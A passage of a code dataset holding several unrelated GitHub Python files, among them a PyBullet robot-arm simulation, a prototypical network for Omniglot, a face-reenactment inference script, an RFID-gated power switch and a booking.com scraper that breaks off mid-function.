(0,-0.5,0))\n\n # makes collisions with plane more stable\n pb.changeDynamics(self.plane_id, -1,\n linearDamping=0.04,\n angularDamping=0.04,\n restitution=0,\n contactStiffness=3000,\n contactDamping=100)\n\n # add robots\n self.robot = RobotArm()\n\n # add the ball\n self.ball_id, self.ball_coll_id, self.ball_vis_id = self.create_ball(\n radius=0.025, \n start_pos=BALL_START_POSITION, \n start_orn_euler=[0.0, 0.0, 0.0]\n )\n\n # add camera\n self.camera = Camera()\n\n\n @staticmethod\n def create_ball(radius: float, start_pos: List[float], start_orn_euler: List[float]) -> Tuple[int, int, int]:\n '''\n Create the ball to use in the simulation. Also sets the initial position and orientation (in radians)\n\n Returns a tuple representing (object_id, collision_id, visual_id)\n '''\n\n # create collision item\n coll_id = pb.createCollisionShape(\n shapeType=pb.GEOM_SPHERE,\n radius=radius\n )\n\n # create visual item\n vis_id = pb.createVisualShape(\n shapeType=pb.GEOM_SPHERE,\n radius=radius,\n rgbaColor=[1.0, 0.0, 0.0, 1.0]\n )\n\n object_id = pb.createMultiBody(BALL_MASS, coll_id, vis_id, basePosition=start_pos, baseOrientation=pb.getQuaternionFromEuler(start_orn_euler))\n\n pb.changeDynamics(\n object_id, \n -1,\n lateralFriction=1,\n spinningFriction=0.005,\n rollingFriction=0.005\n )\n\n return (object_id, coll_id, vis_id)\n\n\n def take_picture(self) -> np.ndarray:\n '''Takes picture using camera\n\n Returns\n -------\n np.ndarray\n rgb image of shape (H,W,3) and dtype of np.uint8\n '''\n return self.camera.get_rgb_image()\n\ndef test_env():\n '''Test the the evironment is set up correctly\n '''\n env = GraspingEnv(True)\n\n pb.resetBaseVelocity(\n objectUniqueId=env.ball_id,\n linearVelocity=[0.0, -0.5, 0.0]\n )\n pb.changeDynamics(\n env.ball_id,\n -1,\n lateralFriction=0.01,\n spinningFriction=0.005,\n rollingFriction=0.005\n )\n\n import time\n counter = 0\n\n while 1:\n pb.stepSimulation()\n time.sleep(1./256)\n\n if counter % 256 == 0:\n env.take_picture()\n\n counter += 1\n\nif __name__ == \"__main__\":\n test_env()\n","repo_name":"matthew-gries/RobotArmSoccer","sub_path":"robot_arm_soccer/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":14827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"15417034898","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import ndimage\nimport multiprocessing as mp\nimport os\nimport cv2\n\nimport torch\nimport torch.nn as nn\nimport torchvision\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\n# Check GPU - False\n# print(torch.cuda.is_available())\n\n# Extract files\n\n'''\nimport zipfile\n\nwith zipfile.ZipFile('./data/images_background.zip') as z:\n z.extractall('.')\n\nwith zipfile.ZipFile('./data/images_evaluation.zip') as z:\n z.extractall('.')\n'''\n\n# Read data\n\ndef read_alphabets(alphabet_directory_path, alphabet_directory_name):\n datax = []\n datay = []\n characteres = os.listdir(alphabet_directory_path)\n\n for character in characteres:\n images = os.listdir(alphabet_directory_path + character + '/')\n for img in images:\n image = cv2.resize(\n cv2.imread(alphabet_directory_path + character + '/' + img), (28,28)\n )\n # rotations of image\n rotated_90 = ndimage.rotate(image, 90)\n rotated_180 = ndimage.rotate(image, 180)\n rotated_270 = ndimage.rotate(image, 270)\n datax.extend((image, rotated_90, rotated_180, rotated_270))\n datay.extend((\n alphabet_directory_name + '_' + character + '_0',\n alphabet_directory_name + '_' + character + '_90',\n alphabet_directory_name + '_' + character + '_180',\n alphabet_directory_name + '_' + character + '_270',\n ))\n return np.array(datax), np.array(datay)\n\ndef read_images(base_directory):\n datax = None\n datay = None\n\n pool = mp.Pool(mp.cpu_count())\n\n results = [pool.apply(read_alphabets, args=(\n base_directory + '/' + directory + '/', directory, \n )) for directory in os.listdir(base_directory)]\n pool.close()\n\n for result in results:\n if datax is None:\n datax = result[0]\n datay = result[1]\n else:\n datax = np.vstack([datax, result[0]])\n datay = np.concatenate([datay, result[1]])\n return datax, datay\n\n\ntrainx, trainy = read_images('images_background')\ntestx, testy = read_images('images_evaluation')\n\nprint(trainx.shape, trainy.shape, testx.shape, testy.shape)\n\n# Create sample\n\ndef extract_sample(n_way, n_support, n_query, datax, datay):\n sample = []\n K = np.random.choice(np.unique(datay), n_way, replace=False)\n for cls in K:\n datax_cls = datax[datay == cls]\n perm = np.random.permutation(datax_cls)\n sample_cls = perm[:(n_support+n_query)]\n sample.append(sample_cls)\n sample = np.array(sample)\n sample = torch.from_numpy(sample).float()\n sample = sample.permute(0,1,4,2,3)\n return({\n 'images': sample,\n 'n_way': n_way,\n 'n_support': n_support,\n 'n_query': n_query\n }) \n\n\ndef display_sample(sample):\n sample_4D = sample.view(sample.shape[0]*sample.shape[1],*sample.shape[2:])\n #make a grid\n out = torchvision.utils.make_grid(sample_4D, nrow=sample.shape[1])\n plt.figure(figsize = (16,7))\n plt.imshow(out.permute(1, 2, 0))\n\n\nsample_example = extract_sample(8, 5, 5, trainx, trainy)\ndisplay_sample(sample_example['images'])\n\nsample_example['images'].shape\n\nclass Flatten(nn.Module):\n def __init__(self):\n super(Flatten, self).__init__()\n def forward(self, x):\n return x.view(x.size(0), -1)\n\ndef load_protonet_conv(**kwargs):\n x_dim = kwargs['x_dim']\n hid_dim = kwargs['hid_dim']\n z_dim = kwargs['z_dim']\n\n def conv_block(in_channels, out_channels):\n return nn.Sequential(\n nn.Conv2d(in_channels, out_channels, 3, padding=1),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(),\n nn.MaxPool2d(2)\n )\n encoder = nn.Sequential(\n conv_block(x_dim[0], hid_dim),\n conv_block(hid_dim, hid_dim),\n conv_block(hid_dim, hid_dim),\n conv_block(hid_dim, z_dim),\n Flatten()\n )\n \n return ProtoNet(encoder)\n\nclass ProtoNet(nn.Module):\n def __init__(self, encoder):\n super(ProtoNet, self).__init__()\n self.encoder = encoder.cuda()\n\n def set_forward_loss(self, sample):\n \n sample_images = sample['images'].cuda()\n n_way = sample['n_way']\n n_support = sample['n_support']\n n_query = sample['n_query']\n\n x_support = sample_images[:, :n_support]\n x_query = sample_images[:, n_support:]\n\n target_inds = torch.arange(0, n_way).view(n_way, 1, 1).expand(n_way, n_query, 1).long()\n target_inds = Variable(target_inds, requires_grad=False)\n target_inds = target_inds.cuda()\n \n \n x = torch.cat([x_support.contiguous().view(n_way * n_support, *x_support.size()[2:]),\n x_query.contiguous().view(n_way * n_query, *x_query.size()[2:])], 0)\n \n z = self.encoder.forward(x)\n z_dim = z.size(-1) #usually 64\n z_proto = z[:n_way*n_support].view(n_way, n_support, z_dim).mean(1)\n z_query = z[n_way*n_support:]\n\n #compute distances\n dists = euclidean_dist(z_query, z_proto)\n \n #compute probabilities\n log_p_y = F.log_softmax(-dists, dim=1).view(n_way, n_query, -1)\n \n loss_val = -log_p_y.gather(2, target_inds).squeeze().view(-1).mean()\n _, y_hat = log_p_y.max(2)\n acc_val = torch.eq(y_hat, target_inds.squeeze()).float().mean()\n \n return loss_val, {\n 'loss': loss_val.item(),\n 'acc': acc_val.item(),\n 'y_hat': y_hat\n }\n\ndef euclidean_dist(x, y):\n n = x.size(0)\n m = y.size(0)\n d = x.size(1)\n assert d == y.size(1)\n\n x = x.unsqueeze(1).expand(n, m, d)\n y = y.unsqueeze(0).expand(n, m, d)\n\n return torch.pow(x - y, 2).sum(2)\n\ndef train(model, optimizer, train_x, train_y, n_way, n_support, n_query, max_epoch, epoch_size):\n scheduler = optim.lr_scheduler.StepLR(optimizer, 1, gamma=0.5, last_epoch=-1)\n epoch = 0 #epochs done so far\n stop = False #status to know when to stop\n\n while epoch < max_epoch and not stop:\n running_loss = 0.0\n running_acc = 0.0\n\n for episode in range(epoch_size):\n sample = extract_sample(n_way, n_support, n_query, train_x, train_y)\n optimizer.zero_grad()\n loss, output = model.set_forward_loss(sample)\n running_loss += output['loss']\n running_acc += output['acc']\n loss.backward()\n optimizer.step()\n epoch_loss = running_loss / epoch_size\n epoch_acc = running_acc / epoch_size\n print('Epoch {:d} -- Loss: {:.4f} Acc: {:.4f}'.format(epoch+1,epoch_loss, epoch_acc))\n epoch += 1\n scheduler.step()\n\nprint(torch.cuda.is_available())\n\nmodel = load_protonet_conv(\n x_dim=(3,28,28),\n hid_dim=64,\n z_dim=64,\n )\n\noptimizer = optim.Adam(model.parameters(), lr = 0.001)\n\nn_way = 60\nn_support = 5\nn_query = 5\n\ntrain_x = trainx\ntrain_y = trainy\n\nmax_epoch = 5\nepoch_size = 2000\n\ntrain(model, optimizer, train_x, train_y, n_way, n_support, n_query, max_epoch, epoch_size)\n\ndef test(model, test_x, test_y, n_way, n_support, n_query, test_episode):\n running_loss = 0.0\n running_acc = 0.0\n for episode in range(test_episode):\n sample = extract_sample(n_way, n_support, n_query, test_x, test_y)\n loss, output = model.set_forward_loss(sample)\n running_loss += output['loss']\n running_acc += output['acc']\n avg_loss = running_loss / test_episode\n avg_acc = running_acc / test_episode\n print('Test results -- Loss: {:.4f} Acc: {:.4f}'.format(avg_loss, avg_acc))\n\n\nn_way = 5\nn_support = 5\nn_query = 5\n\ntest_x = testx\ntest_y = testy\n\ntest_episode = 1000\n\ntest(model, test_x, test_y, n_way, n_support, n_query, test_episode)\n\nmy_sample = extract_sample(n_way, n_support, n_query, test_x, test_y)\ndisplay_sample(my_sample['images'])\n\nmy_loss, my_output = model.set_forward_loss(my_sample)\n\n","repo_name":"maluarmini/Protonet_few_shot_omniglot","sub_path":"protonet.py","file_name":"protonet.py","file_ext":"py","file_size_in_byte":7991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"40857648032","text":"def get_num_classes(pbtxt_fname):\n from object_detection.utils import label_map_util\n label_map = label_map_util.load_labelmap(pbtxt_fname)\n categories = label_map_util.convert_label_map_to_categories(\n label_map, max_num_classes=90, use_display_name=True)\n category_index = label_map_util.create_category_index(categories)\n return len(category_index.keys())\n\nnum_classes = get_num_classes('./labelmap.pbtxt')\nprint(num_classes) # Print the num_classes value","repo_name":"sivertheisholt/Object-Detection-WSL2","sub_path":"get_num_classes.py","file_name":"get_num_classes.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"24768252222","text":"import requests\nimport json\n\nlist_of_real_types = [\"GET\", \"POST\", \"PUT\", \"DELETE\"]\nfake_method = \"HEAD\"\n\n# Делаем запрос без параметра method\nresponse_without_method = requests.post(\"https://playground.learnqa.ru/ajax/api/compare_query_type\")\n\nprint(\"Checking request without method:\")\nprint(response_without_method.text)\n\n# Делаем запрос с заведомо некорректным методом\nresponse_with_fake_method = requests.get(\"https://playground.learnqa.ru/ajax/api/compare_query_type\",\n params={\"method\": f\"{fake_method}\"})\nprint(\"\\nChecking request with fake method:\")\nprint(response_with_fake_method.text)\n\n# Делаем запрос с корректным значением метода\nresponse_with_method = requests.get(\"https://playground.learnqa.ru/ajax/api/compare_query_type\",\n params={\"method\": \"GET\"})\nprint(\"\\nChecking request with real method:\")\nprint(response_with_method.text)\n\n# Пишем цикл для проверки всех возможных вариантов типа запросов и переданных методов\nfor item in range(len(list_of_real_types)):\n for element in range(len(list_of_real_types)):\n http_method = list_of_real_types[element].lower()\n header_method = list_of_real_types[item]\n if http_method in \"get\":\n response = requests.request(method=http_method, url=\"https://playground.learnqa.ru/ajax/api/compare_query_type\",\n params={\"method\": f\"{header_method}\"})\n else:\n response = requests.request(method=http_method,\n url=\"https://playground.learnqa.ru/ajax/api/compare_query_type\",\n data={\"method\": f\"{header_method}\"})\n print(f\"\\nType of request - {http_method} and method - {header_method}:\")\n if http_method in header_method.lower():\n try:\n parsed_response = json.loads(response.text)\n print(parsed_response)\n except json.JSONDecodeError:\n print(\"Response not include any JSON object.\")\n print(response.text)\n else:\n print(response.text)\n","repo_name":"l0myy/LearnQA_PythonAPI","sub_path":"Lesson2/requests_and_methods.py","file_name":"requests_and_methods.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"72763795111","text":"\"\"\" Image to video stepwise face reenactment. \"\"\"\n\nimport os\nfrom math import cos, sin, atan2, asin\nimport face_alignment\nimport cv2\nimport numpy as np\nfrom tqdm import tqdm\nimport torch\nimport fsgan.data.landmark_transforms as landmark_transforms\nimport fsgan.utils.utils as utils\nfrom fsgan.utils.img_utils import create_pyramid\nfrom fsgan.utils.obj_factory import obj_factory\nfrom fsgan.utils.video_utils import extract_landmarks_bboxes_euler_3d_from_video\nfrom fsgan.utils.heatmap import LandmarkHeatmap\nfrom fsgan.models.hopenet import Hopenet\n\n\ndef main(source_path, target_path,\n arch='res_unet_split.MultiScaleResUNet(in_nc=71,out_nc=(3,3),flat_layers=(2,0,2,3),ngf=128)',\n model_path='../weights/ijbc_msrunet_256_1_2_reenactment_stepwise_v1.pth',\n pose_model_path='../weights/hopenet_robust_alpha1.pth',\n pil_transforms1=('landmark_transforms.FaceAlignCrop(bbox_scale=1.2)', 'landmark_transforms.Resize(256)',\n 'landmark_transforms.Pyramids(2)'),\n pil_transforms2=('landmark_transforms.FaceAlignCrop(bbox_scale=1.2)', 'landmark_transforms.Resize(256)',\n 'landmark_transforms.Pyramids(2)'),\n tensor_transforms1=('landmark_transforms.ToTensor()',\n 'transforms.Normalize(mean=[0.5,0.5,0.5],std=[0.5,0.5,0.5])'),\n tensor_transforms2=('landmark_transforms.ToTensor()',\n 'transforms.Normalize(mean=[0.5,0.5,0.5],std=[0.5,0.5,0.5])'),\n output_path=None, crop_size=256, display=False):\n torch.set_grad_enabled(False)\n\n # Initialize models\n fa = face_alignment.FaceAlignment(face_alignment.LandmarksType._3D, flip_input=True)\n device, gpus = utils.set_device()\n G = obj_factory(arch).to(device)\n checkpoint = torch.load(model_path)\n G.load_state_dict(checkpoint['state_dict'])\n G.train(False)\n\n # Initialize pose\n Gp = Hopenet().to(device)\n checkpoint = torch.load(pose_model_path)\n Gp.load_state_dict(checkpoint['state_dict'])\n Gp.train(False)\n\n # Initialize landmarks to heatmaps\n landmarks2heatmaps = [LandmarkHeatmap(kernel_size=13, size=(256, 256)).to(device),\n LandmarkHeatmap(kernel_size=7, size=(128, 128)).to(device)]\n\n # Initialize transformations\n pil_transforms1 = obj_factory(pil_transforms1) if pil_transforms1 is not None else []\n pil_transforms2 = obj_factory(pil_transforms2) if pil_transforms2 is not None else []\n tensor_transforms1 = obj_factory(tensor_transforms1) if tensor_transforms1 is not None else []\n tensor_transforms2 = obj_factory(tensor_transforms2) if tensor_transforms2 is not None else []\n img_transforms1 = landmark_transforms.ComposePyramids(pil_transforms1 + tensor_transforms1)\n img_transforms2 = landmark_transforms.ComposePyramids(pil_transforms2 + tensor_transforms2)\n\n # Process source image\n source_bgr = cv2.imread(source_path)\n source_rgb = source_bgr[:, :, ::-1]\n source_landmarks, source_bbox = process_image(fa, source_rgb, crop_size)\n if source_bbox is None:\n raise RuntimeError(\"Couldn't detect a face in source image: \" + source_path)\n source_tensor, source_landmarks, source_bbox = img_transforms1(source_rgb, source_landmarks, source_bbox)\n source_cropped_bgr = tensor2bgr(source_tensor[0] if isinstance(source_tensor, list) else source_tensor)\n for i in range(len(source_tensor)):\n source_tensor[i] = source_tensor[i].unsqueeze(0).to(device)\n\n # Extract landmarks, bounding boxes, euler angles, and 3D landmarks from target video\n frame_indices, landmarks, bboxes, eulers, landmarks_3d = \\\n extract_landmarks_bboxes_euler_3d_from_video(target_path, Gp, fa, device=device)\n if frame_indices.size == 0:\n raise RuntimeError('No faces were detected in the target video: ' + target_path)\n\n # Open target video file\n cap = cv2.VideoCapture(target_path)\n if not cap.isOpened():\n raise RuntimeError('Failed to read target video: ' + target_path)\n total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n fps = cap.get(cv2.CAP_PROP_FPS)\n\n # Initialize output video file\n if output_path is not None:\n if os.path.isdir(output_path):\n output_filename = os.path.splitext(os.path.basename(source_path))[0] + '_' + \\\n os.path.splitext(os.path.basename(target_path))[0] + '.mp4'\n output_path = os.path.join(output_path, output_filename)\n fourcc = cv2.VideoWriter_fourcc(*'avc1')\n out_vid = cv2.VideoWriter(output_path, fourcc, fps,\n (source_cropped_bgr.shape[1]*3, source_cropped_bgr.shape[0]))\n else:\n out_vid = None\n\n # For each frame in the target video\n valid_frame_ind = 0\n for i in tqdm(range(total_frames)):\n ret, target_bgr = cap.read()\n if target_bgr is None:\n continue\n if i not in frame_indices:\n continue\n target_rgb = target_bgr[:, :, ::-1]\n target_tensor, target_landmarks, target_bbox = img_transforms2(target_rgb, landmarks_3d[valid_frame_ind],\n bboxes[valid_frame_ind])\n target_euler = eulers[valid_frame_ind]\n valid_frame_ind += 1\n\n # TODO: Calculate the number of required reenactment iterations\n reenactment_iterations = 2\n\n # Generate landmarks sequence\n target_landmarks_sequence = []\n for ri in range(1, reenactment_iterations):\n interp_landmarks = []\n for j in range(len(source_tensor)):\n alpha = float(ri) / reenactment_iterations\n curr_interp_landmarks_np = interpolate_points(source_landmarks[j].cpu().numpy(),\n target_landmarks[j].cpu().numpy(), alpha=alpha)\n interp_landmarks.append(torch.from_numpy(curr_interp_landmarks_np))\n target_landmarks_sequence.append(interp_landmarks)\n target_landmarks_sequence.append(target_landmarks)\n\n # Iterative reenactment\n out_img_tensor = source_tensor\n for curr_target_landmarks in target_landmarks_sequence:\n out_img_tensor = create_pyramid(out_img_tensor, 2)\n input_tensor = []\n for j in range(len(out_img_tensor)):\n curr_target_landmarks[j] = curr_target_landmarks[j].unsqueeze(0).to(device)\n curr_target_landmarks[j] = landmarks2heatmaps[j](curr_target_landmarks[j])\n input_tensor.append(torch.cat((out_img_tensor[j], curr_target_landmarks[j]), dim=1))\n out_img_tensor, out_seg_tensor = G(input_tensor)\n\n # Convert back to numpy images\n out_img_bgr = tensor2bgr(out_img_tensor)\n frame_cropped_bgr = tensor2bgr(target_tensor[0])\n\n # Render\n # for point in np.round(frame_landmarks).astype(int):\n # cv2.circle(frame_cropped_bgr, (point[0], point[1]), 2, (0, 0, 255), -1)\n render_img = np.concatenate((source_cropped_bgr, out_img_bgr, frame_cropped_bgr), axis=1)\n if out_vid is not None:\n out_vid.write(render_img)\n if out_vid is None or display:\n cv2.imshow('render_img', render_img)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n\ndef unnormalize(tensor, mean, std):\n \"\"\"Normalize a tensor image with mean and standard deviation.\n\n See :class:`~torchvision.transforms.Normalize` for more details.\n\n Args:\n tensor (Tensor): Tensor image of size (C, H, W) to be normalized.\n mean (sequence): Sequence of means for each channel.\n std (sequence): Sequence of standard deviations for each channely.\n\n Returns:\n Tensor: Normalized Tensor image.\n \"\"\"\n for t, m, s in zip(tensor, mean, std):\n t.mul_(s).add_(m)\n return tensor\n\n\ndef tensor2bgr(img_tensor):\n output_img = unnormalize(img_tensor, [0.5, 0.5, 0.5], [0.5, 0.5, 0.5])\n output_img = output_img.squeeze().permute(1, 2, 0).cpu().numpy()\n output_img = np.round(output_img[:, :, ::-1] * 255).astype('uint8')\n\n return output_img\n\n\ndef process_image(fa, img, size=256):\n detected_faces = fa.face_detector.detect_from_image(img.copy())\n if len(detected_faces) != 1:\n return None, None\n\n preds = fa.get_landmarks(img, detected_faces)\n landmarks = preds[0]\n bbox = detected_faces[0][:4]\n\n # Convert bounding boxes format from [min, max] to [min, size]\n bbox[2:] = bbox[2:] - bbox[:2] + 1\n\n return landmarks, bbox\n\n\ndef matrix2angle(R):\n ''' compute three Euler angles from a Rotation Matrix. Ref: http://www.gregslabaugh.net/publications/euler.pdf\n Args:\n R: (3,3). rotation matrix\n Returns:\n x: yaw\n y: pitch\n z: roll\n '''\n # assert(isRotationMatrix(R))\n\n if R[2, 0] != 1 or R[2, 0] != -1:\n x = asin(R[2, 0])\n y = atan2(R[2, 1] / cos(x), R[2, 2] / cos(x))\n z = atan2(R[1, 0] / cos(x), R[0, 0] / cos(x))\n\n else: # Gimbal lock\n z = 0 # can be anything\n if R[2, 0] == -1:\n x = np.pi / 2\n y = z + atan2(R[0, 1], R[0, 2])\n else:\n x = -np.pi / 2\n y = -z + atan2(-R[0, 1], -R[0, 2])\n\n return x, y, z\n\n\ndef rigid_transform_3d(A, B):\n assert len(A) == len(B)\n\n N = A.shape[0] # total points\n\n centroid_A = np.mean(A, axis=0)\n centroid_B = np.mean(B, axis=0)\n\n # centre the points\n AA = A - np.tile(centroid_A, (N, 1))\n BB = B - np.tile(centroid_B, (N, 1))\n\n # dot is matrix multiplication for array\n H = np.transpose(AA) @ BB\n\n U, S, Vt = np.linalg.svd(H)\n\n R = Vt.T @ U.T\n\n # special reflection case\n if np.linalg.det(R) < 0:\n print\n \"Reflection detected\"\n Vt[2, :] *= -1\n R = Vt.T @ U.T\n\n t = -R @ centroid_A.T + centroid_B.T\n\n return R, t\n\n\ndef euler2mat(angles):\n X = np.eye(3)\n Y = np.eye(3)\n Z = np.eye(3)\n\n x = angles[2]\n y = angles[1]\n z = angles[0]\n\n X[1, 1] = cos(x)\n X[1, 2] = -sin(x)\n X[2, 1] = sin(x)\n X[2, 2] = cos(x)\n\n Y[0, 0] = cos(y)\n Y[0, 2] = sin(y)\n Y[2, 0] = -sin(y)\n Y[2, 2] = cos(y)\n\n Z[0, 0] = cos(z)\n Z[0, 1] = -sin(z)\n Z[1, 0] = sin(z)\n Z[1, 1] = cos(z)\n\n R = Z @ Y @ X\n\n return R\n\n\ndef interpolate_points(points1, points2, alpha=0.5):\n R, t = rigid_transform_3d(points1, points2)\n euler = np.array(matrix2angle(R)) # Yaw, Pitch, Roll\n\n # Interpolate\n euler = euler * alpha\n t = t * alpha\n R = euler2mat([euler[2], -euler[0], euler[1]])\n\n out_pts = points1.transpose()\n out_pts = R @ out_pts\n translation = np.tile(t, (out_pts.shape[1], 1)).transpose()\n out_pts += translation\n out_pts = out_pts.transpose()\n\n return out_pts\n\n\nif __name__ == \"__main__\":\n # Parse program arguments\n import argparse\n parser = argparse.ArgumentParser('reenactment_stepwise')\n parser.add_argument('source', metavar='IMAGE',\n help='path to source image')\n parser.add_argument('-t', '--target', type=str, metavar='VIDEO',\n help='paths to target video')\n parser.add_argument('-a', '--arch',\n default='res_unet_split.MultiScaleResUNet(in_nc=71,out_nc=(3,3),flat_layers=(2,0,2,3),ngf=128)',\n help='model architecture object')\n parser.add_argument('-m', '--model', default='../weights/ijbc_msrunet_256_1_2_reenactment_stepwise_v1.pth',\n metavar='PATH', help='path to face reenactment model')\n parser.add_argument('-pm', '--pose_model', default='../weights/hopenet_robust_alpha1.pth', metavar='PATH',\n help='path to face pose model')\n parser.add_argument('-pt1', '--pil_transforms1', nargs='+', help='first PIL transforms',\n default=('landmark_transforms.FaceAlignCrop(bbox_scale=1.2)', 'landmark_transforms.Resize(256)',\n 'landmark_transforms.Pyramids(2)'))\n parser.add_argument('-pt2', '--pil_transforms2', nargs='+', help='second PIL transforms',\n default=('landmark_transforms.FaceAlignCrop(bbox_scale=1.2)', 'landmark_transforms.Resize(256)',\n 'landmark_transforms.Pyramids(2)'))\n parser.add_argument('-tt1', '--tensor_transforms1', nargs='+', help='first tensor transforms',\n default=('landmark_transforms.ToTensor()',\n 'transforms.Normalize(mean=[0.5,0.5,0.5],std=[0.5,0.5,0.5])'))\n parser.add_argument('-tt2', '--tensor_transforms2', nargs='+', help='second tensor transforms',\n default=('landmark_transforms.ToTensor()',\n 'transforms.Normalize(mean=[0.5,0.5,0.5],std=[0.5,0.5,0.5])'))\n parser.add_argument('-o', '--output', default=None, metavar='PATH',\n help='output video path')\n parser.add_argument('-cs', '--crop_size', default=256, type=int, metavar='N',\n help='crop size of the images')\n parser.add_argument('-d', '--display', action='store_true',\n help='display the rendering')\n args = parser.parse_args()\n main(args.source, args.target, args.arch, args.model, args.pose_model, args.pil_transforms1, args.pil_transforms2,\n args.tensor_transforms1, args.tensor_transforms2, args.output, args.crop_size, args.display)\n","repo_name":"doulujiyao/dafc","sub_path":"inference/reenactment_stepwise.py","file_name":"reenactment_stepwise.py","file_ext":"py","file_size_in_byte":13487,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"71"} +{"seq_id":"71433436391","text":"#!/usr/bin/env python\n\n# Here are the connections between the Raspberry Pi Zero v1.1 and the RFID chip and the PowerSwitch Tail\n# 1 / +3V3 to 3.3V\n# 22 / GPIO25 to RST\n# 6 / GND to GND *AND* -in(pwrtail)\n# 21 / SPI MISO / GPIO10 to MISO\n# 19 / SPI MOSI / GPIO9 to MOSI\n# 23 / SPI SCLK / GPIO11 to SCK\n# 24 / SPI CSO / GPIO8 to SDA\n# 3 / 12C1 SDA / GPIO2 to +in(pwrtail)\n\n# Hello GitHub!\n\nimport RPi.GPIO as GPIO\nimport time\nimport SimpleMFRC522\n\nreader = SimpleMFRC522.SimpleMFRC522() \n\nPwr=2 \nPwr_status = 0\nmode = False\n\ntKey = 't111' #Set this string to the current code for the appropriate training\nsKey = 't999'\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(Pwr,GPIO.OUT)\nGPIO.output(Pwr,Pwr_status)\n\ndef relay():\n\tprint(\"relay\")\n\tglobal Pwr_status\n\tPwr_status = not Pwr_status\n\tGPIO.output(Pwr,Pwr_status)\n\ntry:\n\twhile True:\n\t\tif mode:\n\t\t\tid,text = reader.read()\n\t\t\tif not sKey in text:\n\t\t\t\ttext = text.strip()+\",\"+tKey\n\t\t\t\treader.write(text)\n\t\t\trelay()\n\t\t\ttime.sleep(1)\n\t\t\tmode = False\n\t\telse:\n\t\t\tid,text = reader.read()\n\t\t\tif tKey in text:\n\t\t\t\tif sKey in text:\n\t\t\t\t\tmode = True\n\t\t\t\trelay()\n\t\t\t\ttime.sleep(2)\n\t\tprint(id)\n\t\tprint(text)\n\t\tprint(mode)\n\t\t\nexcept KeyboardInterrupt:\n\tGPIO.cleanup()\n","repo_name":"m-wintersteen/power-switch","sub_path":"py/JB.py","file_name":"JB.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"44087205540","text":"import math\n\nMAX = 20 * 52\n\narray = [True for _ in range(MAX + 1)]\n\nfor i in range(2, int(math.sqrt(MAX)) + 1):\n if array[i]:\n j = 2\n while i * j <= MAX:\n array[i * j] = False\n j += 1\ns = input()\nsum = 0\n\nfor i in range(len(s)):\n if 'a' <= s[i] <= 'z':\n sum += (ord(s[i]) - ord('a')) + 1\n else:\n sum += (ord(s[i]) - ord('A') + 27)\nif array[sum]:\n print('It is a prime word.')\nelse:\n print('It is not a prime word.')\n","repo_name":"mbkim95/Algorithm","sub_path":"Baekjoon/2153.py","file_name":"2153.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"16014828132","text":"import asyncio\n\nfrom sqlalchemy import select\nfrom sqlalchemy.ext.asyncio import async_sessionmaker\n\nfrom database.db import engine, init_models, BotSettings\n\n\nasync def add_column():\n async_session = async_sessionmaker(engine, expire_on_commit=False)\n async with async_session() as session:\n q = 'select(BotSettings)'\n\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n try:\n loop.run_until_complete(init_models())\n loop.run_until_complete(add_column())\n finally:\n loop.close()\n\n","repo_name":"Maniackaa/Userbot-WETH-BTC","sub_path":"database/add_column.py","file_name":"add_column.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"34132863140","text":"import os\nimport re\nimport time\nimport requests\nimport datetime\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\n\nclass fetch_booking_dot_com(object):\n def __init__(self): \n self.output_dir = 'output'\n self.headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36\"\n }\n self.session = requests.Session()\n self.today = datetime.datetime.today()\n self.tomorrow = self.today + datetime.timedelta(1)\n self.home_url = 'https://www.booking.com/'\n self.offset_value = 0\n self.max_offset = 10\n\n def create_dir(self, dirname):\n \"\"\"Method to create directory\"\"\"\n if not os.path.isdir(dirname):\n print('Creating data directory locally: %s' % dirname)\n os.makedirs(dirname)\n print('Successfully created data directory: %s' % dirname)\n\n def create_url(self, country, lang_code, offset_value, label, sid):\n url = \"https://www.booking.com/searchresults.{lang_code}.html?\"\\\n \"label={label}&sid={sid}&sb=1&src=searchresults&src_elem=sb&\"\\\n \"&ss={country}&dest_type=country&checkin_year={in_year}\"\\\n \"&checkin_month={in_month}&checkin_monthday={in_day}\"\\\n \"&checkout_year={out_year}&checkout_month={out_month}\"\\\n \"&checkout_monthday={out_day}&group_adults={people}\"\\\n \"&group_children=0&no_rooms=1&from_sf=1\"\\\n \"&ac_click_type=b&offset={offset}\"\\\n .format(\n lang_code=lang_code,\n label=label,\n sid=sid,\n country=country.replace(' ', '+'),\n in_year=str(self.today.year),\n in_month=str(self.today.month),\n in_day=str(self.today.day),\n out_year=str(self.tomorrow.year),\n out_month=str(self.tomorrow.month),\n out_day=str(self.tomorrow.day),\n people=2,\n offset=offset_value\n )\n return url\n\n def fetch_page(self, url, fname):\n \"\"\" Fetch booking.com pages.\"\"\"\n page = None\n if os.path.isfile(fname):\n print(\"Reading booking.com page: %s\" % fname)\n with open(fname, 'r', encoding='utf-8') as fh:\n page = fh.read()\n else:\n print(\"Fetching booking.com page: %s\" % url)\n res = self.session.get(url, 